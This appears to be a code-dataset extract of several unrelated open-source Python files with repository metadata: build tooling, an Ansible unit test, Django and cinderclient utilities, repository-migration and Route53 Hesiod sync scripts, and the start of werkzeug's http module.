bin/bazel_to_go.py
|
3
|
5775
|
#!/usr/bin/env python
#
# Makes a bazel workspace play nicely with standard go tools
# go build
# go test
# should work after this
#
# It does so by making symlinks from WORKSPACE/vendor to the bazel
# sandbox dirs
#
import glob
import os
import ast
from urlparse import urlparse
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
KEYS = set(["importpath", "remote", "name"])
def keywords(stmt):
kw = {k.arg: k.value.s for k in stmt.keywords if k.arg in KEYS}
path = kw.get("importpath", kw.get("remote"))
u = urlparse(path)
return u.netloc + u.path, kw["name"]
pathmap = {
"github.com/istio/api": "istio.io/api"
}
known_repos = {
"org_golang_google": "google.golang.org",
"com_github": "github.com",
"org_golang": "golang.org",
"in_gopkg": "gopkg.in"
}
# gopkg packages are of type gopkg.in/yaml.v2
# in_gopkg_yaml_v2
# com_github_hashicorp_go_multierror --> github.com/
def repos(name):
for r, m in known_repos.items():
if name.startswith(r):
rname = name[(len(r)+1):]
fp, _, rest = rname.partition('_')
if r == 'in_gopkg':
return m + "/" + fp + "." + rest
return m + "/" + fp + "/" + rest
# If we need to support more bazel functions
# add them here
class WORKSPACE(object):
def __init__(self, external, genfiles, vendor):
self.external = external
self.genfiles = genfiles
self.vendor = vendor
# All functions should return a tuple
# link target, source
# target should exist
def new_go_repository(self, name, path):
return ((self.external + "/" + name, self.vendor + "/" + path))
def new_git_repository(self, name, path):
return((self.genfiles + "/" + name, self.vendor + "/" + path))
def new_git_or_local_repository(self, name, path):
return self.new_git_repository(name, path)
def process(fl, external, genfiles, vendor):
src = open(fl).read()
tree = ast.parse(src, fl)
lst = []
wksp = WORKSPACE(external, genfiles, vendor)
for stmt in ast.walk(tree):
stmttype = type(stmt)
if stmttype == ast.Call:
fn = getattr(wksp, stmt.func.id, "")
if not callable(fn):
continue
path, name = keywords(stmt)
if path.endswith(".git"):
path = path[:-4]
path = pathmap.get(path, path)
tup = fn(name, path)
lst.append(tup)
return lst
def makelink(target, linksrc):
# make a symlink from vendor/path --> target
try:
os.makedirs(os.path.dirname(linksrc))
except Exception as e1:
if 'File exists:' not in str(e1):
print type(e1), e1
try:
os.remove(linksrc)
except Exception as e1:
if 'Is a directory' in str(e1):
return
if 'No such file or directory' not in str(e1):
print type(e1), e1
if not os.path.exists(target):
print target, "Does not exist"
return
os.symlink(target, linksrc)
# print "Linked ", linksrc, '-->', target
def bazel_to_vendor(WKSPC):
WKSPC = os.path.abspath(WKSPC)
workspace = WKSPC + "/WORKSPACE"
if not os.path.isfile(workspace):
print "WORKSPACE file not found in " + WKSPC
print "prog BAZEL_WORKSPACE_DIR"
return -1
lf = os.readlink(WKSPC + "/bazel-mixer")
EXEC_ROOT = os.path.dirname(lf)
BLD_DIR = os.path.dirname(EXEC_ROOT)
external = BLD_DIR + "/external"
vendor = WKSPC + "/vendor"
genfiles = WKSPC + "/bazel-genfiles/external/"
links = {target: linksrc for(target, linksrc) in process(workspace, external, genfiles, vendor)}
bysrc = {}
for (target, linksrc) in links.items():
makelink(target, linksrc)
#print "Vendored", linksrc, '-->', target
bysrc[linksrc] = target
# check other directories in external
# and symlink ones that were not covered thru workspace
for ext_target in get_external_links(external):
target = external + "/" + ext_target
if target in links:
continue
link = repos(ext_target)
if not link:
# print "Could not resolve", ext_target
continue
if link in pathmap:
# skip remapped deps
continue
linksrc = vendor + "/" + link
# only make this link if we have not made it above
if linksrc in bysrc:
# print "Skipping ", link
continue
makelink(target, linksrc)
# print "Vendored", linksrc, '-->', target
adapter_protos(WKSPC)
aspect_protos(WKSPC)
def get_external_links(external):
return [file for file in os.listdir(external) if os.path.isdir(external+"/"+file)]
def main(args):
WKSPC = os.getcwd()
if len(args) > 0:
WKSPC = args[0]
bazel_to_vendor(WKSPC)
def adapter_protos(WKSPC):
for adapter in os.listdir(WKSPC + "/bazel-genfiles/adapter/"):
if os.path.exists(WKSPC + "/bazel-genfiles/adapter/"+ adapter + "/config"):
for file in os.listdir(WKSPC + "/bazel-genfiles/adapter/" + adapter + "/config"):
if file.endswith(".pb.go"):
makelink(WKSPC + "/bazel-genfiles/adapter/"+ adapter + "/config/" + file, WKSPC + "/adapter/" +adapter + "/config/" + file)
def aspect_protos(WKSPC):
for aspect in os.listdir(WKSPC + "/bazel-genfiles/pkg/aspect/"):
for file in os.listdir(WKSPC + "/bazel-genfiles/pkg/aspect/config"):
if file.endswith(".pb.go"):
makelink(WKSPC + "/bazel-genfiles/pkg/aspect/config/" + file, WKSPC + "/pkg/aspect/config/" + file)
if __name__ == "__main__":
import sys
sys.exit(main(sys.argv[1:]))
|
apache-2.0
|
onitake/ansible
|
test/units/modules/network/f5/test_bigip_provision.py
|
21
|
4395
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
if sys.version_info < (2, 7):
pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7")
from ansible.module_utils.basic import AnsibleModule
try:
from library.modules.bigip_provision import Parameters
from library.modules.bigip_provision import ModuleManager
from library.modules.bigip_provision import ArgumentSpec
# In Ansible 2.8, Ansible changed import paths.
from test.units.compat import unittest
from test.units.compat.mock import Mock
from test.units.compat.mock import patch
from test.units.modules.utils import set_module_args
except ImportError:
from ansible.modules.network.f5.bigip_provision import Parameters
from ansible.modules.network.f5.bigip_provision import ModuleManager
from ansible.modules.network.f5.bigip_provision import ArgumentSpec
# Ansible 2.8 imports
from units.compat import unittest
from units.compat.mock import Mock
from units.compat.mock import patch
from units.modules.utils import set_module_args
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
args = dict(
module='gtm',
password='password',
server='localhost',
user='admin'
)
p = Parameters(params=args)
assert p.module == 'gtm'
class TestManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
self.patcher1 = patch('time.sleep')
self.patcher1.start()
def tearDown(self):
self.patcher1.stop()
def test_provision_one_module_default_level(self, *args):
# Configure the arguments that would be sent to the Ansible module
set_module_args(dict(
module='gtm',
password='password',
server='localhost',
user='admin'
))
# Configure the parameters that would be returned by querying the
# remote device
current = Parameters(
dict(
module='gtm',
level='none'
)
)
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
mm = ModuleManager(module=module)
# Override methods to force specific logic in the module to happen
mm.update_on_device = Mock(return_value=True)
mm.read_current_from_device = Mock(return_value=current)
mm.reboot_device = Mock(return_value=True)
mm.save_on_device = Mock(return_value=True)
# this forced sleeping can cause these tests to take 15
# or more seconds to run. This is deliberate.
mm._is_mprov_running_on_device = Mock(side_effect=[True, False, False, False, False])
results = mm.exec_module()
assert results['changed'] is True
assert results['level'] == 'nominal'
def test_provision_all_modules(self, *args):
modules = [
'afm', 'am', 'sam', 'asm', 'avr', 'fps',
'gtm', 'lc', 'ltm', 'pem', 'swg', 'ilx',
'apm',
]
for module in modules:
# Configure the arguments that would be sent to the Ansible module
set_module_args(dict(
module=module,
password='password',
server='localhost',
user='admin'
))
with patch('ansible.module_utils.basic.AnsibleModule.fail_json') as mo:
AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode,
)
mo.assert_not_called()
|
gpl-3.0
|
tangentlabs/django-fancypages
|
fancypages/compat.py
|
1
|
1314
|
# -*- coding: utf-8 -*-
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
_user_model = None
try:
from django.utils.module_loading import import_string
except ImportError:
from django.utils.module_loading import import_by_path as import_string # noqa
def get_user_model():
"""
Get the Django user model class in a backwards compatible way to previous
Django version that don't provide this functionality. The result is cached
after the first call.
Returns the user model class.
"""
global _user_model
if not _user_model:
# we have to import the user model here because we can't be sure
# that the app providing the user model is fully loaded.
try:
from django.contrib.auth import get_user_model
except ImportError:
from django.contrib.auth.models import User
else:
User = get_user_model()
_user_model = User
return _user_model
AUTH_USER_MODEL = getattr(settings, 'AUTH_USER_MODEL', 'auth.User')
try:
AUTH_USER_MODEL_NAME = AUTH_USER_MODEL.split('.')[1]
except IndexError:
raise ImproperlyConfigured(
"invalid user model '{}' specified has to be in the format "
"'app_label.model_name'.".format(AUTH_USER_MODEL))
|
bsd-3-clause
|
apache/infrastructure-puppet
|
modules/gitbox/files/bin/graduate-podling.py
|
3
|
5934
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This is a migration script for git repositories on gitbox, git-wip and git.a.o.
When run on git-wip or gitbox, it:
- Renames the repositories locally
- Updates git origins
- Updates mailing list settings
- Renames the reposiories on GitHub
When run on git.a.o, it:
- Renames the repository
- Updates SVN remote if this is a SVN mirror
Usage: graduate-podling.py $project, e.g.: graduate-podling.py ponymail
MUST BE RUN AS www-data OR git USER!
"""
import os
import sys
import re
import requests
import json
import git
import ConfigParser
import pwd
REPO_ROOT = "/x1/repos/asf" # Root dir for all repos
CONFIG_FILE = "/x1/gitbox/matt/tools/grouper.cfg" # config file with GH token in it
IS_MIRROR = False # Set to True on git.a.o to avoid a GitHub call!
CONFIG = ConfigParser.ConfigParser()
TOKEN = None
if not IS_MIRROR:
CONFIG.read(CONFIG_FILE) # Shhhh
TOKEN = CONFIG.get('github', 'token')
def rename_github_repo(token, old, new):
"""
Renames a repository on GitHub by sending a PATCH request.
"""
# Cut away the .git ending if it's there
old = old.replace(".git", "")
new = new.replace(".git", "")
# API URL for patching the name
url = "https://api.github.com/repos/apache/%s" % old
# Headers - json payload + creds
headers = {
'content-type': 'application/json',
}
# Construct payload
payload = json.dumps({
'name': new
})
# Run the request
print(" - Changing repository from %s to %s on GitHub..." % (old, new))
r = requests.patch(url, headers = headers, data = payload, auth = (token, 'x-oauth-basic'))
if r.status_code == requests.codes.ok:
print(" - Repository name changed!")
else:
print(" - Something went wrong :(")
print(r.text)
print("Something did not work here, aborting process!!")
print("Fix the issue and run the tool again.")
sys.exit(-1)
def rename_local_repo(old, new, project):
"""
Renames local repositories:
- Rename the git dir
- Change remote origin (svn or git)
- Change commit notification ML
- Change PR notification ML
"""
# First, rename the dir on the box. Fall flat on our behind if this fails.
print(" - Renaming gitbox repo from %s/%s to %s/%s..." % (REPO_ROOT, old, REPO_ROOT, new))
os.rename("%s/%s" % (REPO_ROOT, old), "%s/%s" % (REPO_ROOT, new))
# Change git config options
gcpath = "%s/%s/config" % (REPO_ROOT, new)
if not os.path.exists(gcpath):
gcpath = "%s/%s/.git/config" % (REPO_ROOT, new)
gconf = git.GitConfigParser(gcpath, read_only = False)
# Remote origin on GitHub
if gconf.has_section('remote "origin"'):
print(" - Setting remote...")
gconf.set('remote "origin"', 'url', "https://github.com/apache/%s" % new)
# Remote copy on GitHub
if gconf.has_section('remote "github-copy"'):
print(" - Setting remote...")
gconf.set('remote "github-copy"', 'url', "https://github.com/apache/%s" % new)
# Remote SVN origin?
if gconf.has_section('svn-remote "svn"'):
svnremote = gconf.get('svn-remote "svn"', 'url')
newsvn = svnremote.replace("/incubator/", "/")
print(" - Setting SVN remote from %s to %s...")
gconf.set('svn-remote "svn"', 'url', newsvn)
# ML notification targets for commits and PRs
print(" - Changing notification options..")
if gconf.has_option('hooks.asfgit', 'recips'):
ml = gconf.get('hooks.asfgit', 'recips')
ml = re.sub(r"incubator\.", "", ml)
print(" - Changing commit ML to %s" % ml)
gconf.set('hooks.asfgit', 'recips', ml)
if gconf.has_section('apache') and gconf.has_option('apache', 'dev'):
ml = gconf.get('apache', 'dev')
ml = re.sub(r"incubator\.", "", ml)
print(" - Changing PR notification ML to %s" % ml)
gconf.set('apache', 'dev', ml)
print(" - Done!")
# Demand being run by www-data or git
me = pwd.getpwuid(os.getuid()).pw_name
if me != "www-data" and me != "git":
print("You must run this as either www-data (on gitbox/git-wip) or git (on git.a.o)!")
print("You are running as: %s" % me)
sys.exit(-1)
# Expect one project name passed on, and only one!
if len(sys.argv) == 2:
PROJECT = sys.argv[1]
print("Graduating %s..." % PROJECT)
if os.path.isdir(REPO_ROOT):
pr = 0
for repo in os.listdir(REPO_ROOT):
m = re.match(r"incubator-%s(-.+)?(\.git)?$"% PROJECT, repo)
if m:
pr += 1
print("- Applying changes to %s ..." % repo)
new = repo.replace("incubator-", "")
rename_local_repo(repo, new, PROJECT)
if not IS_MIRROR:
rename_github_repo(TOKEN, repo, new)
print("All done, processed %u repositories!" % pr)
else:
print("%s does not seem to be a directory, aborting!" % REPO_ROOT)
else:
print("Usage: graduate-podling.py $podling")
print("Example: graduate-podling.py openwhisk")
|
apache-2.0
|
neumerance/deploy
|
.venv/lib/python2.7/site-packages/cinderclient/utils.py
|
3
|
9043
|
# Copyright 2013 OpenStack LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import os
import re
import sys
import uuid
import six
import prettytable
from cinderclient import exceptions
from cinderclient.openstack.common import strutils
def arg(*args, **kwargs):
"""Decorator for CLI args."""
def _decorator(func):
add_arg(func, *args, **kwargs)
return func
return _decorator
def env(*vars, **kwargs):
"""
returns the first environment variable set
if none are non-empty, defaults to '' or keyword arg default
"""
for v in vars:
value = os.environ.get(v, None)
if value:
return value
return kwargs.get('default', '')
def add_arg(f, *args, **kwargs):
"""Bind CLI arguments to a shell.py `do_foo` function."""
if not hasattr(f, 'arguments'):
f.arguments = []
# NOTE(sirp): avoid dups that can occur when the module is shared across
# tests.
if (args, kwargs) not in f.arguments:
# Because of the sematics of decorator composition if we just append
# to the options list positional options will appear to be backwards.
f.arguments.insert(0, (args, kwargs))
def add_resource_manager_extra_kwargs_hook(f, hook):
"""Adds hook to bind CLI arguments to ResourceManager calls.
The `do_foo` calls in shell.py will receive CLI args and then in turn pass
them through to the ResourceManager. Before passing through the args, the
hooks registered here will be called, giving us a chance to add extra
kwargs (taken from the command-line) to what's passed to the
ResourceManager.
"""
if not hasattr(f, 'resource_manager_kwargs_hooks'):
f.resource_manager_kwargs_hooks = []
names = [h.__name__ for h in f.resource_manager_kwargs_hooks]
if hook.__name__ not in names:
f.resource_manager_kwargs_hooks.append(hook)
def get_resource_manager_extra_kwargs(f, args, allow_conflicts=False):
"""Return extra_kwargs by calling resource manager kwargs hooks."""
hooks = getattr(f, "resource_manager_kwargs_hooks", [])
extra_kwargs = {}
for hook in hooks:
hook_name = hook.__name__
hook_kwargs = hook(args)
conflicting_keys = set(hook_kwargs.keys()) & set(extra_kwargs.keys())
if conflicting_keys and not allow_conflicts:
msg = ("Hook '%(hook_name)s' is attempting to redefine attributes "
"'%(conflicting_keys)s'" % {
'hook_name': hook_name,
'conflicting_keys': conflicting_keys
})
raise Exception(msg)
extra_kwargs.update(hook_kwargs)
return extra_kwargs
def unauthenticated(f):
"""
Adds 'unauthenticated' attribute to decorated function.
Usage:
@unauthenticated
def mymethod(f):
...
"""
f.unauthenticated = True
return f
def isunauthenticated(f):
"""
Checks to see if the function is marked as not requiring authentication
with the @unauthenticated decorator. Returns True if decorator is
set to True, False otherwise.
"""
return getattr(f, 'unauthenticated', False)
def service_type(stype):
"""
Adds 'service_type' attribute to decorated function.
Usage:
@service_type('volume')
def mymethod(f):
...
"""
def inner(f):
f.service_type = stype
return f
return inner
def get_service_type(f):
"""
Retrieves service type from function
"""
return getattr(f, 'service_type', None)
def pretty_choice_list(l):
return ', '.join("'%s'" % i for i in l)
def _print(pt, order):
if sys.version_info >= (3, 0):
print(pt.get_string(sortby=order))
else:
print(strutils.safe_encode(pt.get_string(sortby=order)))
def print_list(objs, fields, formatters={}, order_by=None):
mixed_case_fields = ['serverId']
pt = prettytable.PrettyTable([f for f in fields], caching=False)
pt.aligns = ['l' for f in fields]
for o in objs:
row = []
for field in fields:
if field in formatters:
row.append(formatters[field](o))
else:
if field in mixed_case_fields:
field_name = field.replace(' ', '_')
else:
field_name = field.lower().replace(' ', '_')
data = getattr(o, field_name, '')
row.append(data)
pt.add_row(row)
if order_by is None:
order_by = fields[0]
_print(pt, order_by)
def print_dict(d, property="Property"):
pt = prettytable.PrettyTable([property, 'Value'], caching=False)
pt.aligns = ['l', 'l']
[pt.add_row(list(r)) for r in six.iteritems(d)]
_print(pt, property)
def find_resource(manager, name_or_id):
"""Helper for the _find_* methods."""
# first try to get entity as integer id
try:
if isinstance(name_or_id, int) or name_or_id.isdigit():
return manager.get(int(name_or_id))
except exceptions.NotFound:
pass
if sys.version_info <= (3, 0):
name_or_id = strutils.safe_decode(name_or_id)
# now try to get entity as uuid
try:
uuid.UUID(name_or_id)
return manager.get(name_or_id)
except (ValueError, exceptions.NotFound):
pass
try:
try:
return manager.find(human_id=name_or_id)
except exceptions.NotFound:
pass
# finally try to find entity by name
try:
return manager.find(name=name_or_id)
except exceptions.NotFound:
try:
return manager.find(display_name=name_or_id)
except (UnicodeDecodeError, exceptions.NotFound):
try:
# Volumes does not have name, but display_name
return manager.find(display_name=name_or_id)
except exceptions.NotFound:
msg = "No %s with a name or ID of '%s' exists." % \
(manager.resource_class.__name__.lower(), name_or_id)
raise exceptions.CommandError(msg)
except exceptions.NoUniqueMatch:
msg = ("Multiple %s matches found for '%s', use an ID to be more"
" specific." % (manager.resource_class.__name__.lower(),
name_or_id))
raise exceptions.CommandError(msg)
def _format_servers_list_networks(server):
output = []
for (network, addresses) in list(server.networks.items()):
if len(addresses) == 0:
continue
addresses_csv = ', '.join(addresses)
group = "%s=%s" % (network, addresses_csv)
output.append(group)
return '; '.join(output)
class HookableMixin(object):
"""Mixin so classes can register and run hooks."""
_hooks_map = {}
@classmethod
def add_hook(cls, hook_type, hook_func):
if hook_type not in cls._hooks_map:
cls._hooks_map[hook_type] = []
cls._hooks_map[hook_type].append(hook_func)
@classmethod
def run_hooks(cls, hook_type, *args, **kwargs):
hook_funcs = cls._hooks_map.get(hook_type) or []
for hook_func in hook_funcs:
hook_func(*args, **kwargs)
def safe_issubclass(*args):
"""Like issubclass, but will just return False if not a class."""
try:
if issubclass(*args):
return True
except TypeError:
pass
return False
def import_class(import_str):
"""Returns a class from a string including module and class."""
mod_str, _sep, class_str = import_str.rpartition('.')
__import__(mod_str)
return getattr(sys.modules[mod_str], class_str)
_slugify_strip_re = re.compile(r'[^\w\s-]')
_slugify_hyphenate_re = re.compile(r'[-\s]+')
# http://code.activestate.com/recipes/
# 577257-slugify-make-a-string-usable-in-a-url-or-filename/
def slugify(value):
"""
Normalizes string, converts to lowercase, removes non-alpha characters,
and converts spaces to hyphens.
From Django's "django/template/defaultfilters.py".
"""
import unicodedata
if not isinstance(value, six.text_type):
value = six.text_type(value)
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = six.text_type(_slugify_strip_re.sub('', value).strip().lower())
return _slugify_hyphenate_re.sub('-', value)
|
apache-2.0
|
fullcontact/hesiod53
|
hesiod53/sync.py
|
1
|
11846
|
#!/usr/bin/env python
from boto.route53.record import ResourceRecordSets
from boto.route53.status import Status
import boto.route53 as r53
from collections import namedtuple
import argparse
import time
import yaml
# a DNS record for hesiod
# fqdn should include the trailing .
# value should contain the value without quotes
DNSRecord = namedtuple("DNSRecord", "fqdn value")
# A UNIX group
class Group(object):
def __init__(self, name, gid):
if not name:
raise Exception("Group name must be provided.")
if not gid:
raise Exception("Group ID must be provided.")
self.name = str(name)
self.gid = int(gid)
if len(self.passwd_line([]).split(":")) != 4:
raise Exception("Invalid group, contains colons: %s" % self)
def users(self, users):
r = []
for user in users:
if self in user.groups:
r.append(user)
return r
def dns_records(self, hesiod_domain, users):
records = []
passwd_line = self.passwd_line(users)
# group record
fqdn = "%s.group.%s" % (self.name, hesiod_domain)
records.append(DNSRecord(fqdn.lower(), passwd_line))
# gid record
fqdn = "%s.gid.%s" % (self.gid, hesiod_domain)
records.append(DNSRecord(fqdn.lower(), passwd_line))
return records
@classmethod
# returns group, usernames list
# usernames will be empty if only a partial line
def parse_passwd_line(cls, line):
parts = line.split(":")
if len(parts) != 3 and len(parts) != 4:
raise Exception("Invalid group passwd line: %s" % line)
name = parts[0]
gid = parts[2]
usernames = []
if len(parts) == 4:
usernames = parts[3].split(",")
return Group(name, gid), usernames
def passwd_line(self, users):
usernames = ",".join(sorted(map(lambda u: u.username, self.users(users))))
return "%s:x:%d:%s" % (self.name, self.gid, usernames)
def __eq__(self, other):
return self.name == other.name and self.gid == other.gid
def __ne__(self, other):
return not self == other
def __repr__(self):
return "Group(name=%s, gid=%s)" % (self.name, self.gid)
# A UNIX user
class User(object):
def __init__(self, name, username, uid, groups, ssh_keys, homedir=None, shell="/bin/bash"):
self.name = str(name)
self.username = str(username)
self.uid = int(uid)
self.groups = groups
self.ssh_keys = list(ssh_keys)
if not homedir:
homedir = "/home/%s" % self.username
self.homedir = str(homedir)
self.shell = str(shell)
if len(self.passwd_line().split(":")) != 7:
raise Exception("Invalid user, contains colons: %s" % self)
@classmethod
# returns user, primary group id
def parse_passwd_line(cls, line):
line = line.replace('"', '')
parts = line.split(":")
if len(parts) != 7:
raise Exception("Invalid user passwd line: %s" % line)
username, x, uid, group, gecos, homedir, shell = parts
name = gecos.split(",")[0]
group = int(group)
return User(name, username, uid, [], [], homedir, shell), group
def dns_records(self, hesiod_domain):
records = []
# user record
fqdn = "%s.passwd.%s" % (self.username, hesiod_domain)
records.append(DNSRecord(fqdn.lower(), self.passwd_line()))
# uid record
fqdn = "%s.uid.%s" % (self.uid, hesiod_domain)
records.append(DNSRecord(fqdn.lower(), self.passwd_line()))
# group list record
gl = []
for group in sorted(self.groups, key=lambda g: g.gid):
gl.append("%s:%s" % (group.name, group.gid))
fqdn = "%s.grplist.%s" % (self.username, hesiod_domain)
records.append(DNSRecord(fqdn.lower(), ":".join(gl)))
# ssh records
if self.ssh_keys:
ssh_keys_count_fqdn = "%s.count.ssh.%s" % (self.username, hesiod_domain)
records.append(DNSRecord(ssh_keys_count_fqdn.lower(), str(len(self.ssh_keys))))
# Need to keep this around for backwards compatibility when only one ssh key worked
legacy_ssh_key_fqdn = "%s.ssh.%s" % (self.username, hesiod_domain)
records.append(DNSRecord(legacy_ssh_key_fqdn.lower(), self.ssh_keys[0]))
for _id, ssh_key in enumerate(self.ssh_keys):
ssh_key_fqdn = "%s.%s.ssh.%s" % (self.username, _id, hesiod_domain)
records.append(DNSRecord(ssh_key_fqdn.lower(), ssh_key))
return records
def passwd_line(self):
gid = ""
if self.groups:
gid = str(self.groups[0].gid)
return "%s:x:%d:%s:%s:%s:%s" % \
(self.username, self.uid, gid, self.gecos(), self.homedir, self.shell)
def gecos(self):
return "%s,,,," % self.name
def __eq__(self, other):
return self.passwd_line() == other.passwd_line()
def __ne__(self, other):
return not self == other
def __repr__(self):
return ("User(name=%s, username=%s, uid=%s, groups=%s, ssh_keys=%s, " +
"homedir=%s, shell=%s)") % \
(self.name, self.username, self.uid, self.groups,
self.ssh_keys, self.homedir, self.shell)
# syncs users and groups to route53
# users is a list of users
# groups is a list of groups
# route53_zone - the hosted zone in Route53 to modify, e.g. example.com
# hesiod_domain - the zone with hesiod information, e.g. hesiod.example.com
def sync(users, groups, route53_zone, hesiod_domain, dry_run):
conn = r53.connect_to_region('us-east-1')
record_type = "TXT"
ttl = "60"
# suffix of . on zone if not supplied
if route53_zone[-1:] != '.':
route53_zone += "."
if hesiod_domain[-1:] != '.':
hesiod_domain += "."
# get existing hosted zones
zones = {}
results = conn.get_all_hosted_zones()
for r53zone in results['ListHostedZonesResponse']['HostedZones']:
zone_id = r53zone['Id'].replace('/hostedzone/', '')
zones[r53zone['Name']] = zone_id
# ensure requested zone is hosted by route53
if not route53_zone in zones:
raise Exception("Zone %s does not exist in Route53" % route53_zone)
sets = conn.get_all_rrsets(zones[route53_zone])
# existing records
existing_records = set()
for rset in sets:
if rset.type == record_type:
if rset.name.endswith("group." + hesiod_domain) or \
rset.name.endswith("gid." + hesiod_domain) or \
rset.name.endswith("passwd." + hesiod_domain) or \
rset.name.endswith("uid." + hesiod_domain) or \
rset.name.endswith("grplist." + hesiod_domain) or \
rset.name.endswith("ssh." + hesiod_domain):
value = "".join(rset.resource_records).replace('"', '')
existing_records.add(DNSRecord(str(rset.name), str(value)))
# new records
new_records = set()
for group in groups:
for record in group.dns_records(hesiod_domain, users):
new_records.add(record)
for user in users:
for record in user.dns_records(hesiod_domain):
new_records.add(record)
to_remove = existing_records - new_records
to_add = new_records - existing_records
if to_remove:
print "Deleting:"
for r in sorted(to_remove):
print r
print
else:
print "Nothing to delete."
if to_add:
print "Adding:"
for r in sorted(to_add):
print r
print
else:
print "Nothing to add."
if dry_run:
print "Dry run mode. Stopping."
return
# stop if nothing to do
if not to_remove and not to_add:
return
changes = ResourceRecordSets(conn, zones[route53_zone])
for record in to_remove:
removal = changes.add_change("DELETE", record.fqdn, record_type, ttl)
removal.add_value(txt_value(record.value))
for record in to_add:
addition = changes.add_change("CREATE", record.fqdn, record_type, ttl)
addition.add_value(txt_value(record.value))
try:
result = changes.commit()
status = Status(conn, result["ChangeResourceRecordSetsResponse"]["ChangeInfo"])
except r53.exception.DNSServerError, e:
raise Exception("Could not update DNS records.", e)
while status.status == "PENDING":
print "Waiting for Route53 to propagate changes."
time.sleep(10)
print status.update()
# DNS text values are limited to chunks of 255, but multiple chunks are concatenated
# Amazon handles this by requiring you to add quotation marks around each chunk
def txt_value(value):
first = value[:255]
rest = value[255:]
if rest:
rest_value = txt_value(rest)
else:
rest_value = ""
return '"%s"%s' % (first, rest_value)
def load_data(filename):
with open(filename, "r") as f:
contents = yaml.load(f, Loader=yaml.FullLoader)
route53_zone = contents["route53_zone"]
hesiod_domain = contents["hesiod_domain"]
# all groups and users
groups_idx = {}
users_idx = {}
groups = []
users = []
for g in contents["groups"]:
group = Group(**g)
if group.name in groups_idx:
raise Exception("Group name is not unique: %s" % group.name)
if group.gid in groups_idx:
raise Exception("Group ID is not unique: %s" % group.gid)
groups_idx[group.name] = group
groups_idx[group.gid] = group
groups.append(group)
for u in contents["users"]:
groups_this = []
if u["groups"]:
for g in u["groups"]:
group = groups_idx[g]
if not group:
raise Exception("No such group: %s" % g)
groups_this.append(group)
u["groups"] = groups_this
user = User(**u)
if len(user.groups) == 0:
raise Exception("At least one group required for user %s" % \
user.username)
if user.username in users_idx:
raise Exception("Username is not unique: %s" % user.username)
if user.uid in users_idx:
raise Exception("User ID is not unique: %s" % user.uid)
users_idx[user.username] = user
users_idx[user.uid] = user
users.append(user)
return users, groups, route53_zone, hesiod_domain
def main():
parser = argparse.ArgumentParser(
description="Synchronize a user database with Route53 for Hesiod.",
epilog = "AWS credentials follow the Boto standard. See " +
"http://docs.pythonboto.org/en/latest/boto_config_tut.html. " +
"For example, you can populate AWS_ACCESS_KEY_ID and " +
"AWS_SECRET_ACCESS_KEY with your credentials, or use IAM " +
"role-based authentication (in which case you need not do " +
"anything).")
parser.add_argument("user_file", metavar="USER_FILE",
help="The user yaml file. See example_users.yml for an example.")
parser.add_argument("--dry-run",
action='store_true',
dest="dry_run",
help="Dry run mode. Do not commit any changes.",
default=False)
args = parser.parse_args()
users, groups, route53_zone, hesiod_domain = load_data(args.user_file)
sync(users, groups, route53_zone, hesiod_domain, args.dry_run)
print "Done!"
if __name__ == "__main__":
main()
|
mit
|
sk-yoh/qiaoy-byte
|
lib/werkzeug/http.py
|
317
|
33404
|
# -*- coding: utf-8 -*-
"""
werkzeug.http
~~~~~~~~~~~~~
Werkzeug comes with a bunch of utilities that help Werkzeug to deal with
HTTP data. Most of the classes and functions provided by this module are
used by the wrappers, but they are useful on their own, too, especially if
the response and request objects are not used.
This covers some of the more HTTP centric features of WSGI, some other
utilities such as cookie handling are documented in the `werkzeug.utils`
module.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import re
from time import time, gmtime
try:
from email.utils import parsedate_tz
except ImportError: # pragma: no cover
from email.Utils import parsedate_tz
try:
from urllib2 import parse_http_list as _parse_list_header
except ImportError: # pragma: no cover
from urllib.request import parse_http_list as _parse_list_header
from datetime import datetime, timedelta
from hashlib import md5
import base64
from werkzeug._internal import _cookie_quote, _make_cookie_domain, \
_cookie_parse_impl
from werkzeug._compat import to_unicode, iteritems, text_type, \
string_types, try_coerce_native, to_bytes, PY2, \
integer_types
# incorrect
_cookie_charset = 'latin1'
_accept_re = re.compile(r'([^\s;,]+)(?:[^,]*?;\s*q=(\d*(?:\.\d+)?))?')
_token_chars = frozenset("!#$%&'*+-.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
'^_`abcdefghijklmnopqrstuvwxyz|~')
